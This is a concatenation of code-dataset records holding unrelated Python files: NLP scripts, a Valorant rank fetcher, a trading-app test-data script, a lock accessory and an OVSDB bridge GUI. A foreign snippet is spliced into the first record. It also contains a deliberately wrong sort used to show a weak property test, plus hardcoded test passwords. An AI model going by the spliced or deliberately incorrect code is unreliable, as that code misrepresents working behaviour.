finished\n\t\n\tsummary.write(\"------------------------------------------\\n\")\n\tsummary.write(\"{:>25s}\".format(\"SUMMARY\"))\n\tsummary.write(\"\\n------------------------------------------\\n\")\n\t#writing infos in files\n\tfor phoneme, lengths in total_ms.items():\n\t\twith open(output_dir+ \"/distrib-\" + phoneme + \".txt\", \"w\") as outfile:\n\t\t\toutfile.write(\"\\n\".join([\"{:.3f}\".format(length) for length in lengths])) #write durations one by one\n\t\t\toutfile.write(\"\\n\")\n\t\t#outfile.closed\n\t\tnb_occ=len(lengths) #number of occurrence of the phoneme\n\t\t#mean_dur=sum(lengths)/nb_occ #mean duration of the phoneme in milliseconds\n\t\tmean_dur=np.mean(lengths)\n\t\tmean_dur_s=mean_dur/1000 #mean duration in seconds\n\t\t#calculation of the standard deviation\n\t\t#x=0\n\t\t#for length in lengths:\n\t\t#\tx+=(length-mean_dur)**2\n\t\t#sd=sqrt(x/nb_occ) #standard deviation of the phoneme\n\t\tsd=np.std(lengths)\n\t\tsummary.write(\"Phoneme {} appears {} 
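The membership test used when filling total_ms above can also be written with collections.defaultdict; a small equivalent sketch (the rttm-style sample lines are invented, but use the same field positions as the parser above):

from collections import defaultdict

total_ms = defaultdict(list)
for line in ['SPK 1 0 120.0 t_B', 'SPK 1 0 80.0 a_I', 'SPK 1 0 95.0 t_E']:
    duration_ms = float(line.split(' ')[3])             # field 3: duration in ms
    phoneme = line.split(' ')[4].split('_')[0].strip()  # field 4: label, e.g. t_B -> t
    total_ms[phoneme].append(duration_ms)

assert total_ms['t'] == [120.0, 95.0]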
times.\\n\".format(phoneme,nb_occ))\n\t\tsummary.write(\"Average length of the phoneme {} is {:.2f}, namely {:.2f} sec.\".format(phoneme,mean_dur,mean_dur_s))\n\t\tsummary.write(\"\\nStandard deviation of {} is {:.2f}.\".format(phoneme,sd))\n\t\tsummary.write(\"\\n------------------------------------------\\n\")\n\t\tprint(\"------------------------------------------\\n\")\n\t\tprint(\"SUMMARY\")\n\t\tprint(\"\\nPhoneme {} appears {} times.\\n\".format(phoneme,nb_occ))\n\t\tprint(\"Average length of the phoneme {}: {:.2f}, namely {:.2f} sec.\".format(phoneme,mean_dur,mean_dur_s))\n\t\tprint(\"Standard deviation of {} = {:.2f}\\n\".format(phoneme,sd))\n\t#endFor\n#summary.closed\n","sub_path":"stats4dnn_ali.py","file_name":"stats4dnn_ali.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"252525044","text":"#Problem:\n#On a staircase, the i-th step has some non-negative cost cost[i] assigned (0 indexed).\n#Once you pay the cost, you can either climb one or two steps.\n#You need to find minimum cost to reach the top of the floor, and you can either start from the step with index 0, or the step with index 1.\n\n#Solution:\ndef minCost(cost):\n l = len(cost)\n dp0 = dp1 = dp2 = 0\n for i in range(l):\n dp0 = cost[i] + min(dp1, dp2)\n dp2 = dp1\n dp1 = dp0\n \n return min(dp1,dp2) \n","sub_path":"Dynamic-Programming/Min-Cost-Climbing-Stairs/MinCostClimbingStairs.py","file_name":"MinCostClimbingStairs.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"476056509","text":"from django.urls import path\nfrom rest_framework import routers\nfrom . import views\nfrom utility.AppScheduler import AppScheduler\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n path('profile', views.user_own_profile),\n path('self/post/list', views.user_post_list),\n path('profile/edit', views.edit_profile),\n path('post/edit', views.edit_post),\n path('post/delete', views.delete_post),\n path('self/saved/post/list', views.user_saved_post_list),\n path('profile/delete', views.user_delete_profile)\n]\n\nurlpatterns += router.urls","sub_path":"user_profile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"302477104","text":"# Reading the e960401 file for basic manipulation\n\nimport re\nimport math\nimport string\nfrom functools import reduce\nimport numpy as np\nimport nltk\n# This library is for a HTML Parser\nfrom bs4 import BeautifulSoup\n\n\ndef remove_characters_after_tokenization(tokens):\n '''Remove special characters, we receive tokens'''\n pattern = re.compile('[{}]'.format(re.escape(string.punctuation)))\n filtered_tokens = filter(None, [pattern.sub(' ', token)\n for token in tokens])\n return list(filtered_tokens)\n\n\ndef save_words(name, words):\n '''Save a file with a list of words, each word in a new line'''\n with open(name, \"w\") as f:\n for w in words:\n f.write(w+\"\\n\")\n\n\ndef get_context(tokens, word, window=8):\n '''Get the context or bag of words of a given word inside a text'''\n bag = []\n cl = tokens.concordance_list(word, lines=tokens.count(word))\n # tokens.concordance(word)\n for c in cl:\n left = list(c[0][-window//2:])\n right = list(c[2][:window//2])\n bag += left\n bag += right\n return list(bag)\n\n\ncorpus_root = '../../Corpus'\narticle_name = 'e960401.htm'\ntext 
= \"\"\n# Read the hole file\n# The test has a sample of the hole file, only one paragraph\nwith open(corpus_root+\"/\"+article_name, encoding='latin-1') as f:\n text = f.read()\n\nsoup = BeautifulSoup(text, 'lxml')\nparsedText = soup.get_text()\nparsedText = parsedText.replace('\\x97', ' ')\nfor c in string.punctuation:\n parsedText.replace(c, ' ')\n\ntokens = nltk.Text(nltk.word_tokenize(parsedText))\nprint(\"Amount of raw tokens \", len(tokens))\nstopwords = nltk.corpus.stopwords.words('spanish')\n# tokens = remove_characters_after_tokenization([\n# t.lower() for t in tokens if t.isalpha() and t.lower() not in stopwords])\n# Para usar stopwords\ntokens = remove_characters_after_tokenization([\n t.lower() for t in tokens if t.isalpha()])\ntokens = nltk.Text(tokens)\nsave_words('tokens.txt', tokens)\n\nprint(\"Amount of clean tokens without stopwords \", len(tokens))\nvocabulary = sorted(set(t.lower() for t in tokens if t.isalpha()))\nsave_words('vocabulary.txt', vocabulary)\nprint(\"Vocabulary lenght = \", len(vocabulary))\n\nprint(vocabulary[:20])\nprint(vocabulary[-20:])\n\n# Get the context, and compute the similarity between search words\n# search_words = ['empresa', 'agua', 'compañía', 'empresa']\nsearch_words = ['empresa'] + vocabulary\nvectors = []\nbags = []\nfor w in search_words:\n bag = get_context(tokens, w, 8)\n # print(\"The bag of words of '\", w, \"' is: \", bag[:8])\n # save_words('context-'+w+'.txt', bag)\n vector = [np.array([bag.count(t)/len(bag) for t in vocabulary]), 0, w]\n # print(\"The vector of \", w, \" is \", vector)\n vectors.append(vector)\n bags.append(list(bag))\n # Check if we count all items correctly\n # assert len(bag) == reduce((lambda x, y: x+y), vector)\n # assert len(bag) == vector.sum()\n\n# print(\"Vectors are \", vectors)\n\nfor i in range(1):\n for j in range(i+1, len(search_words)):\n dot = np.dot(vectors[i][0], vectors[j][0])\n mag1 = np.sqrt(vectors[i][0].dot(vectors[i][0]))\n mag2 = np.sqrt(vectors[j][0].dot(vectors[j][0]))\n sim = dot/(mag1*mag2)\n vectors[j][1] = sim\n\nvectors = sorted(vectors, key=lambda e: e[1], reverse=True)\n\nsimilarWords = []\nfor i in range(50):\n r = \"sim({}, {}) = {}\".format(search_words[0], vectors[i][2],\n vectors[i][1])\n similarWords.append(vectors[i][1])\n print(r)\n","sub_path":"09-05/similarEOWC.py","file_name":"similarEOWC.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"432779492","text":"import requests\nimport json\nimport re\nimport datetime\nimport yaml\nimport os\n\nconfigpath = os.path.dirname(__file__) + '\\\\config.yaml'\nwith open(configpath) as file:\n config = yaml.load(file, Loader=yaml.FullLoader)\n region = config['region']\n username = config['username']\n password = config['password']\n\nsession = requests.session()\n\n# Set initial headers\nheaders = {\n 'Content-type': 'application/json'\n}\n\n# Perform auth request to retrieve session cookies\nuri = 'https://auth.riotgames.com/api/v1/authorization'\ndata = {\n 'client_id': 'play-valorant-web-prod',\n 'nonce': '1',\n 'redirect_uri': 'https://playvalorant.com/opt_in',\n 'response_type': 'token id_token',\n}\ndata_json = json.dumps(data)\nresponse = session.post(uri, data=data_json, headers=headers)\n\n# Login and set Authorization header\nuri = 'https://auth.riotgames.com/api/v1/authorization'\ndata = {\n 'type': 'auth',\n 'username': username,\n 'password': password\n}\ndata_json = json.dumps(data)\nresponse = session.put(uri, 
data=data_json, headers=headers)\npattern = re.compile('access_token=([a-zA-Z0-9.\\-_]+)&.*id_token=([a-zA-Z0-9.\\-_]+)&.*expires_in=(\\d+)')\nauth_data = pattern.findall(response.json()['response']['parameters']['uri'])[0]\nheaders['Authorization'] = 'Bearer ' + auth_data[0]\n\n# Retrieve entitlements and set X-Riot-Entitlements-JWT header\nuri = 'https://entitlements.auth.riotgames.com/api/token/v1'\nresponse = session.post(uri, data={}, headers=headers)\nheaders['X-Riot-Entitlements-JWT'] = response.json()['entitlements_token']\n\n# Retrieve user_id\nuri = 'https://auth.riotgames.com/userinfo'\nresponse = session.get(uri, headers=headers)\nuser_id = response.json()['sub']\n\n# Request match history\nuri = f'https://pd.{region}.a.pvp.net/mmr/v1/players/{user_id}/competitiveupdates?startIndex=0&endIndex=20'\nresponse = session.get(uri, headers=headers)\n\nrank_map = {\n 0: 'UNKNOWN', 1: 'UNKNOWN 1', 2: 'UNKNOWN 2',\n 3: 'IRON 1', 4: 'IRON 2', 5: 'IRON 3',\n 6: 'BRON 1', 7: 'BRON 2', 8: 'BRON 3',\n 9: 'SILV 1', 10: 'SILV 2', 11: 'SILV 3',\n 12: 'GOLD 1', 13: 'GOLD 2', 14: 'GOLD 3',\n 15: 'PLAT 1', 16: 'PLAT 2', 17: 'PLAT 3',\n 18: 'DIAM 1', 19: 'DIAM 2', 20: 'DIAM 3',\n 21: 'IMMO 1', 22: 'IMMO 2', 23: 'IMMO 3',\n 24: 'RADIANT'\n}\n\nlevel_map = {\n 'Bonsai': 'Split',\n 'Port': 'Icebox',\n 'Triad': 'Haven',\n 'Duality': 'Bind',\n 'Ascent': 'Ascent',\n '?': '?'\n}\n\nfor match in response.json()['Matches']:\n value = match['TierProgressAfterUpdate']\n change = match['TierProgressAfterUpdate'] - match['TierProgressBeforeUpdate']\n rank = rank_map.get(match['TierAfterUpdate'])\n friendly_change = f'+{change}' if (change > 0) else f'{change}'\n friendly_time = datetime.datetime.utcfromtimestamp(match['MatchStartTime'] / 1000).strftime('%Y-%m-%d %H:%M')\n level = match['MapID'].split('/')[3] if match['MapID'] else '?'\n friendly_level = level_map.get(level)\n print(f'{friendly_time} {str.rjust(friendly_level,6)} {str.rjust(str(value),3)} ({str.rjust(friendly_change,3)}) [{rank}]')\n\ninput(\"Press enter...\")\n\n","sub_path":"elo.py","file_name":"elo.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"625674021","text":"# py.test -p no:django -v\n\ndef sort(list_of_ints, descending):\n assert isinstance(list_of_ints, list)\n assert all(isinstance(x, int) for x in list_of_ints)\n if descending:\n return list(range(len(list_of_ints), 0, -1))\n else:\n return list(range(0, len(list_of_ints)))\n\n\nfrom hypothesis import given\nimport hypothesis.strategies as st\n\n\n@given(st.lists(st.integers()), st.booleans())\ndef test_ordering(values, descending):\n result = sort(values, descending)\n for i in range(0, len(result) - 1):\n if descending:\n assert result[i] >= result[i + 1]\n else:\n assert result[i] <= result[i + 1]\n","sub_path":"content/Property Based Testing/code-snippets-1/test_sorting_incorrect_passing_ordering_only_2.py","file_name":"test_sorting_incorrect_passing_ordering_only_2.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"221930703","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport http.client\nfrom urllib.parse import urlencode\nimport hashlib\nfrom pprint import pprint\n\nheaders = {\n 'Connection': 'Keep-Alive',\n 'User-Agent': 'okhttp/3.4.1',\n 'Content-Type': 'application/x-www-form-urlencoded',\n # 'Content-length': 209,\n 'Accept-Encoding': 'gzip',\n 
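The ordering-only property above passes even though sort() throws its input away, which is exactly the point of the file name: ordering alone underdetermines a sort. A companion property requiring the output to be a permutation of the input would catch the fake implementation; a sketch, assuming the sort() defined above is in scope:

from collections import Counter

from hypothesis import given
import hypothesis.strategies as st


@given(st.lists(st.integers()), st.booleans())
def test_permutation(values, descending):
    # fails for the fake sort() above, which invents fresh values
    result = sort(values, descending)
    assert Counter(result) == Counter(values)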
'sys_deviceid': 'TA09004V1Y',\n 'sys_platform': 'android',\n 'sys_version': '',\n 'sys_versioncode': '',\n 'app_channel': '',\n 'app_versionname': ''\n}\n\napi_host = '10.82.12.25:9080'\n# Create a connection instance to the host\nconn = http.client.HTTPConnection(api_host)\n\n\ndef post_request(request_url, request_data, current_headers):\n request_data = urlencode(request_data, True)\n conn.request('POST', request_url, request_data, headers=current_headers)\n return conn.getresponse().read()\n\n\n# Log in and return the login result\ndef log_in(username, password):\n request_url = '/trade-app-api/user/login'\n request_data = {\n 'loginname': username,\n 'password': md5_encode(password)\n }\n log_in_result = post_request(request_url, request_data, headers)\n return json.loads(log_in_result)['result']\n\n\n# md5 encryption\ndef md5_encode(ori_str):\n hash_md5 = hashlib.md5()\n hash_md5.update(ori_str.encode('utf-8')) # Unicode-objects must be encoded before hashing\n return hash_md5.hexdigest()\n\n# Extract the token (session) from the login result\nbuyer_session = log_in('12000000075', '123456')['token']\nseller_session = log_in('12000000080', '123456')['token']\n\n\n# Common API: view bidding categories / spot categories / product names / industries / annual revenue, etc.\ndef common():\n request_url = '/trade-app-api/common'\n request_data = {'version': ''}\n result = json.loads(post_request(request_url, request_data, headers))['result']\n pprint(result)\n\n\n# Get the buyer's or seller's orders in a given status\ndef get_orders():\n account_type = int(input('Please enter whose orders to get (1-buyer, 2-seller): '))\n status = int(input('Please enter the order status to get (1-all, 9-pending signature, 2-pending payment, 3-pending delivery, 4-pending confirmation): '))\n request_url = '/trade-app-api/order/list'\n request_data = {\n # 1-all 2-pending payment 3-pending delivery 4-pending delivery confirmation 5-completed 6-pending review 7-in dispute 8-closed\n # 9-pending signature 10-unpaid (incl. pending signature 9, pending payment 2) 11-paid (incl. pending delivery 3, pending confirmation 4, in dispute 7) 12-completed (incl. completed, pending review)\n 'status': status,\n 'type': account_type,\n 'pageNo': 1,\n 'pageSize': 12\n }\n if account_type == 1:\n headers.update({'app_session': buyer_session})\n elif account_type == 2:\n headers.update({'app_session': seller_session})\n result = post_request(request_url, request_data, headers)\n orders = json.loads(result)['result']\n return orders\n\n\n# Get the seller's list of listed non-bidding goods\ndef get_my_goods():\n goods_id = []\n request_url = '/trade-app-api/mine/product/list'\n request_data = {\n 'pageNo': 1,\n 'pageSize': 12\n }\n headers.update({'app_session': seller_session})\n result = json.loads(post_request(request_url, request_data, headers))['result']\n pprint(result)\n for i in range(len(result)):\n if result[i]['quotedStatus'] == '5' and result[i]['bidType'] != '3': # listing status (5-listed, 8-sales paused)\n goods_id.append(result[i]['id'])\n if len(goods_id) != 0:\n print('Fetched the list of listed seller goods successfully!')\n return goods_id\n\n\n# Add goods to the buyer's cart\ndef add_to_cart(good_id):\n request_url = '/trade-app-api/shopping/add'\n request_data = {\n 'id': good_id\n }\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n print(json.loads(result)['msg'])\n\n\n# Get the buyer's cart list; returns the goods' cart ids as a list\ndef get_cart_list():\n send_type = int(input('Please enter which delivery method to list carts for (1-buyer self-pickup, 2-seller delivery, pay before shipping, 3-seller delivery, pay on delivery): '))\n goods_cart_id = []\n request_url = '/trade-app-api/shopping/list'\n request_data = {\n 'sendType': send_type\n }\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n goods_list = json.loads(result)['result']\n for company in goods_list:\n for good in company['goodsList']:\n goods_cart_id.append(good['id'])\n if len(goods_cart_id) != 0:\n print('Fetched the cart list for the chosen delivery method successfully!')\n return goods_cart_id, send_type\n\n\n# Go to checkout, the step before submitting the order; optional\ndef to_purchase(goods_cart_id):\n request_url = '/trade-app-api/order/account'\n # if 
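md5_encode above just hex-digests the UTF-8 bytes of its input; a quick standalone check against the widely documented digest of '123456':

import hashlib

digest = hashlib.md5('123456'.encode('utf-8')).hexdigest()
assert digest == 'e10adc3949ba59abbe56e057f20f883e'  # well-known md5 of '123456'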
submit_type == '1': # check out one by one\n request_data = {\n 'cartId': goods_cart_id\n }\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n return json.loads(result)['result']\n\n\n# Get the buyer's default receiving address\ndef get_default_receiving_address():\n request_url = '/trade-app-api/address/get-default'\n request_data = {}\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n default_address_id = json.loads(result)['result']['id']\n if default_address_id is None:\n new_address()\n default_address_id = get_default_receiving_address()\n else:\n print('Got the buyer default receiving address')\n return default_address_id\n\n\n# Get the seller's first sending address\ndef get_first_sending_address():\n request_url = '/trade-app-api/address/list'\n request_data = {'type': 1} # 0-receiving address, 1-sending address\n headers.update({'app_session': seller_session})\n result = post_request(request_url, request_data, headers)\n address_list = json.loads(result)['result']\n if len(address_list) == 0: # index only after confirming the list is non-empty\n print('Please create a sending address (1)')\n new_address()\n first_sending_address = get_first_sending_address()\n else:\n first_sending_address = address_list[0]['id']\n print('Got the seller first sending address')\n return first_sending_address\n\n\n# Create a new receiving address for the buyer (called when the buyer has no address)\ndef new_address():\n request_url = '/trade-app-api/address/update'\n address_type = int(input('Please enter whether to create a receiving address (0) or a sending address (1): '))\n request_data = {\n 'company': 'Test Co., Ltd.',\n 'address': 'No. 1234 Tianfu 3rd Street',\n 'area': 'Chengdu, Sichuan',\n 'province': '26',\n 'city': '355',\n 'country': '2796',\n 'phone': '13408620260',\n 'user': 'Zheng zmm',\n 'checked': False,\n 'id': 0,\n 'type': address_type\n }\n if address_type == 1:\n request_data.update({'storeAddress': 'Test Chengdu warehouse'})\n headers.update({'app_session': seller_session})\n elif address_type == 0:\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n if '保存成功' in json.loads(result)['msg']: # '保存成功' means 'saved successfully'; the server replies in Chinese\n print('Created a new ' + ('sending' if address_type == 1 else 'receiving') + ' address successfully!')\n\n\n# Submit the order; the goods' cart ids and the default address id must be fetched first\ndef submit_order(goods_cart_id, address_id, send_type):\n if int(send_type) == 1:\n pay_type = int(input('Please enter the desired payment method (0-offline payment, 1-online payment): '))\n else:\n pay_type = 1\n request_url = '/trade-app-api/order/add'\n request_data = {\n 'cartId': goods_cart_id,\n 'addressid': address_id,\n 'payType': pay_type # 0-offline payment, 1-online payment (for goods delivered via buyer self-pickup)\n }\n\n print('Submitting the order, payment method is ' + ('offline payment' if pay_type == 0 else 'online payment'))\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n if len(json.loads(result)['result']) != 0:\n print('Order submitted successfully!')\n\n\n# From fetching the seller's listed goods, through adding to cart, to submitting the order\ndef submit_order_package():\n for good_id in get_my_goods():\n add_to_cart(good_id)\n cart_list = get_cart_list()\n goods_card_id = cart_list[0]\n send_type = cart_list[1]\n address_id = get_default_receiving_address()\n submit_order(goods_card_id, address_id, send_type)\n\n\n# List a good for sale\ndef submit_good():\n request_url = '/trade-app-api/mine/product/modify'\n bid_type = int(input('Please enter the trade mode of the good (1: negotiation, 2: fixed price, 3: bidding, 4: steel mill direct sale): '))\n send_type = int(input('Please enter the delivery method of the good (1-buyer self-pickup, 2-seller delivery, pay before shipping, 3-seller delivery, pay on delivery): '))\n sign_mode = int(input('Please enter the signing mode of the good (1-automatic signing, 2-manual signing): '))\n address_id = get_first_sending_address()\n request_data = {\n 'bidType': bid_type, # trade mode\n 'smallTypeId': '0bf5e824da164743a109eec113fd9533', # sub-category (variety) id\n 'specName': 'xx@oo', # spec name\n 'brandId': 'fb22b24cee444d0483b57a7a452e29c7', # product name id\n 'materialName': 'oo@xx', # material name\n 'factoryId': 'fb53e3c6a7554edfb4929bb3e67232d9', # steel mill id\n 'difference': '/*-+', # negative tolerance\n 
'measurementType': 2, # measurement method (1: theoretical weight, 2: weighbridge)\n 'amount': 22, # total = listed offer quantity + unit\n 'price': 1.5, # unit price (CNY)\n 'minBuy': 2, # minimum order quantity\n 'sendType': send_type, # delivery method\n 'addressId': address_id, # stock address Id\n 'united': '8b99cdcee2c643849a05323405ff6bc4', # unit id\n 'signMode': sign_mode,\n 'quotedStatus': 5, # listing status (1: pending submission, 2: pending deposit payment, 5: listed, 8: sales paused)\n }\n if bid_type in (1, 2):\n request_data.update({'dueTime': '2017-06-30 00:00:00'})\n elif bid_type == 3:\n start_time = input('Please enter the bidding start time (format: 2017-06-30 22:22:22): ')\n end_time = input('Please enter the bidding end time (format: 2017-06-30 00:00:00): ')\n request_data.update({\n 'sellerDepositRatio': 10,\n 'buyerDepositRatio': 20,\n 'buyerFeeId': '3b66da23d01447b9986d9fac2b3f82f4',\n 'sellerFeeId': 'e8c1b95beddf4a118022c36025d7d415',\n 'stepMoney': 1,\n 'startTime': start_time,\n 'endTime': end_time\n })\n headers.update({'app_session': seller_session})\n pprint(request_data)\n result = post_request(request_url, request_data, headers)\n print(json.loads(result)['msg'])\n\n\ndef main():\n # get_my_goods()\n # for good_id in get_my_goods():\n # add_to_cart(good_id)\n # print(goods_card_id)\n # pprint(get_orders(1, 1))\n # submit_order_package()\n # new_address()\n submit_good()\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":10992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"483197807","text":"\"\"\"Class to hold all lock accessories.\"\"\"\nimport logging\n\nfrom pyhap.const import CATEGORY_DOOR_LOCK\n\nfrom openpeerpower.components.lock import DOMAIN, STATE_LOCKED, STATE_UNLOCKED\nfrom openpeerpower.const import ATTR_CODE, ATTR_ENTITY_ID, STATE_UNKNOWN\nfrom openpeerpower.core import callback\n\nfrom .accessories import TYPES, HomeAccessory\nfrom .const import CHAR_LOCK_CURRENT_STATE, CHAR_LOCK_TARGET_STATE, SERV_LOCK\n\n_LOGGER = logging.getLogger(__name__)\n\nOPP_TO_HOMEKIT = {\n STATE_UNLOCKED: 0,\n STATE_LOCKED: 1,\n # Value 2 is Jammed which opp doesn't have a state for\n STATE_UNKNOWN: 3,\n}\n\nHOMEKIT_TO_OPP = {c: s for s, c in OPP_TO_HOMEKIT.items()}\n\nSTATE_TO_SERVICE = {STATE_LOCKED: \"lock\", STATE_UNLOCKED: \"unlock\"}\n\n\n@TYPES.register(\"Lock\")\nclass Lock(HomeAccessory):\n \"\"\"Generate a Lock accessory for a lock entity.\n\n The lock entity must support: unlock and lock.\n \"\"\"\n\n def __init__(self, *args):\n \"\"\"Initialize a Lock accessory object.\"\"\"\n super().__init__(*args, category=CATEGORY_DOOR_LOCK)\n self._code = self.config.get(ATTR_CODE)\n state = self.opp.states.get(self.entity_id)\n\n serv_lock_mechanism = self.add_preload_service(SERV_LOCK)\n self.char_current_state = serv_lock_mechanism.configure_char(\n CHAR_LOCK_CURRENT_STATE, value=OPP_TO_HOMEKIT[STATE_UNKNOWN]\n )\n self.char_target_state = serv_lock_mechanism.configure_char(\n CHAR_LOCK_TARGET_STATE,\n value=OPP_TO_HOMEKIT[STATE_LOCKED],\n setter_callback=self.set_state,\n )\n self.async_update_state(state)\n\n def set_state(self, value):\n \"\"\"Set lock state to value if call came from HomeKit.\"\"\"\n _LOGGER.debug(\"%s: Set state to %d\", self.entity_id, value)\n\n opp_value = HOMEKIT_TO_OPP.get(value)\n service = STATE_TO_SERVICE[opp_value]\n\n if self.char_current_state.value != value:\n self.char_current_state.set_value(value)\n\n params = {ATTR_ENTITY_ID: self.entity_id}\n if self._code:\n params[ATTR_CODE] = self._code\n self.async_call_service(DOMAIN, service, params)\n\n @callback\n def async_update_state(self, new_state):\n \"\"\"Update lock 
after state changed.\"\"\"\n opp_state = new_state.state\n if opp_state in OPP_TO_HOMEKIT:\n current_lock_state = OPP_TO_HOMEKIT[opp_state]\n _LOGGER.debug(\n \"%s: Updated current state to %s (%d)\",\n self.entity_id,\n opp_state,\n current_lock_state,\n )\n # LockTargetState only supports locked and unlocked\n # Must set lock target state before current state\n # or there will be no notification\n if (\n opp_state in (STATE_LOCKED, STATE_UNLOCKED)\n and self.char_target_state.value != current_lock_state\n ):\n self.char_target_state.set_value(current_lock_state)\n\n # Set lock current state ONLY after ensuring that\n # target state is correct or there will be no\n # notification\n if self.char_current_state.value != current_lock_state:\n self.char_current_state.set_value(current_lock_state)\n","sub_path":"openpeerpower/components/homekit/type_locks.py","file_name":"type_locks.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522449970","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 7 21:32:35 2019\r\n\r\n2d6db786-0708-4110-8ab2-c89d388004fe\r\n\r\n@author: eric\r\n\"\"\"\r\n# Example\r\nimport json\r\nimport requests\r\nimport urllib.parse\r\nfrom tkinter import *\r\nfrom tkinter import simpledialog\r\nfrom tkinter import messagebox\r\nfrom requests.auth import HTTPBasicAuth\r\n\r\n\r\nuuid=\"\"\r\nip=\"\"\r\ndata = {}\r\ndatabridge = {}\r\ndataport = {}\r\ndatacheckconnection={}\r\npath = ''\r\nfileName ='activeconnection'\r\nfileNameBridge ='bridge'\r\nfileNamePort ='port'\r\ndef get_data(): \r\n global uuid\r\n global ip\r\n global data\r\n global putURLconnection\r\n ip=simpledialog.askstring(\"Input Manager ip\",\" Please enter Manager ip \")\r\n uuid=simpledialog.askstring(\"Input Switch uuid\",\" Please enter uuid \")\r\n print(uuid)\r\n ipswitch=simpledialog.askstring(\"Input Switch ip\", \" Please enter Switch ip \")\r\n print(ipswitch)\r\n data = {\r\n \"network-topology:node\": [\r\n {\r\n \"node-id\": \"ovsdb://uuid/\"+uuid,\r\n \"connection-info\": {\r\n \"ovsdb:remote-port\": \"6640\",\r\n \"ovsdb:remote-ip\": ipswitch\r\n }\r\n }\r\n ]\r\n }\r\n putURLconnection='http://' + ip + ':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid\r\n print(putURLconnection)\r\n writeToJSONFile(path,fileName,data)\r\n \r\ndef getconnectionapi():\r\n global datacheckconnection\r\n urlget = 'http://'+ip+':8181/restconf/operational/network-topology:network-topology/topology/ovsdb:1/'\r\n response = requests.get(urlget, auth = HTTPBasicAuth('admin','admin'))\r\n print(response.status_code)\r\n response.json()\r\n with open('data.json','w') as outfile:\r\n json.dump(response.json(),outfile,sort_keys=True,indent=4) \r\n datacheckconnection=response.json()\r\n\r\ndef checkconnection():\r\n getconnectionapi()\r\n for here in datacheckconnection['topology']:\r\n if 'node' not in here:\r\n messagebox.showerror(\"Error\", \"Not Connected\")\r\n else:\r\n messagebox.showinfo(\"Information\",\"Connected\") \r\n \r\ndef checkresult(hasil):\r\n branchcheck = Tk()\r\n branchcheck.title('Result')\r\n Label3= Label(branchcheck, text=hasil, font = ('Calibri' , 20), fg = 'black', width = 11, height = 2, borderwidth = 1, relief = 'solid')\r\n Label3.pack()\r\n branchcheck.geometry(\"200x200\")\r\n branchcheck.mainloop()\r\n \r\n \r\ndef writeToJSONFile(path, fileName, data):\r\n filePathNameWExt = path + fileName + '.json'\r\n with 
open(filePathNameWExt, 'w') as fp:\r\n json.dump(data, fp , sort_keys=True,indent=4) \r\n \r\n\r\ndef initiateconnection():\r\n dataconnection = 'activeconnection.json'\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n with open(dataconnection) as fh:\r\n mydata = fh.read()\r\n responsePut = requests.put(putURLconnection,\r\n data=mydata,\r\n auth=HTTPBasicAuth('admin','admin'),\r\n headers=headers,\r\n )\r\n print(responsePut.status_code)\r\n #checkresult(responsePut.status_code)\r\n \r\n \r\ndef addbridge():\r\n global databridge\r\n global putURLbridge\r\n bridge=simpledialog.askstring(\"input bridge name\",\"please enter bridge name\")\r\n ipcontroller=simpledialog.askstring(\"input Controller ip\",\"please enter Controller ip\")\r\n print(bridge)\r\n databridge={\r\n \"network-topology:node\": [\r\n {\r\n \"node-id\": \"ovsdb://uuid/\"+uuid+\"/bridge/\"+bridge,\r\n \"ovsdb:bridge-name\": bridge,\r\n \"ovsdb:protocol-entry\": [\r\n \t\t{\r\n \t\t\t\"protocol\": \"ovsdb:ovsdb-bridge-protocol-openflow-13\"\r\n \t\t}\r\n \t ],\r\n \"ovsdb:controller-entry\": [\r\n {\r\n \"target\": \"tcp:\" + ipcontroller + \":6633\"\r\n }\r\n ],\r\n \"ovsdb:managed-by\": \"/network-topology:network-topology/network-topology:topology[network-topology:topology-id='ovsdb:1']/network-topology:node[network-topology:node-id='ovsdb://uuid/\"+ uuid +\"']\"\r\n }\r\n ]\r\n }\r\n putURLbridge='http://'+ip+':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid+'%2Fbridge%2F'+ bridge\r\n \r\n\r\ndef sendbridge():\r\n dataconnection = 'bridge.json'\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n with open(dataconnection) as fh:\r\n mydata = fh.read()\r\n responsePut = requests.put(putURLbridge,\r\n data=mydata,\r\n auth=HTTPBasicAuth('admin','admin'),\r\n headers=headers,\r\n )\r\n print(responsePut.status_code)\r\n #checkresult(responsePut.status_code)\r\n \r\ndef combinebridge():\r\n addbridge()\r\n writeToJSONFile(path,fileNameBridge,databridge)\r\n sendbridge()\r\n \r\ndef addport():\r\n global 